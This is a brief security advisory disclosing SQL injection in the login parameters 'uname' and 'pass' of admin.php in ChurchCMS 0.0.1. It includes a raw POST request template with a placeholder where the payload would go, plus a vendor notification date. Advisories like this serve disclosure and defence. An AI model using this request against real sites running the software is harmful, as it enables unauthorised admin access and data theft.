ChurchCMS 0.0.1 'admin.php' Multiple SQLi

ChurchCMS 0.0.1 ‘admin.php’ Multiple SQLi

##### Description #####

ChurchCMS is the software to place on your church’s website that is easily managed, self-intuitive, yet expandable via our module library.

Included features are: announcements, calendar, prayer requests manager, and help wanted manager.

 

 ##### Vulnerability #####

The admin.php page has multiple SQL injection vulnerabilities.  Both the ‘uname’ and ‘pass’  parameters are vulnerable to SQL Injection.

The vulnerability exists via the POST method.

 

##### Exploit #####

POST http://localhost/churchcms/admin.php?op=login HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)

Gecko/20100101 Firefox/11.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Proxy-Connection: keep-alive

Referer: http://localhost/churchcms/index.php

Cookie: PHPSESSID=eq342ldrgqt4i5fshe6q2kvj17

Content-Type: application/x-www-form-urlencoded

Content-length: 40

uname=[SQLi]&pass=[SQLi]

 

##### Vendor Notification #####

04/21/12 – Vendor notified

Per my disclosure policy, advisory is released.

http://www.g13net.com/vuln-disc.txt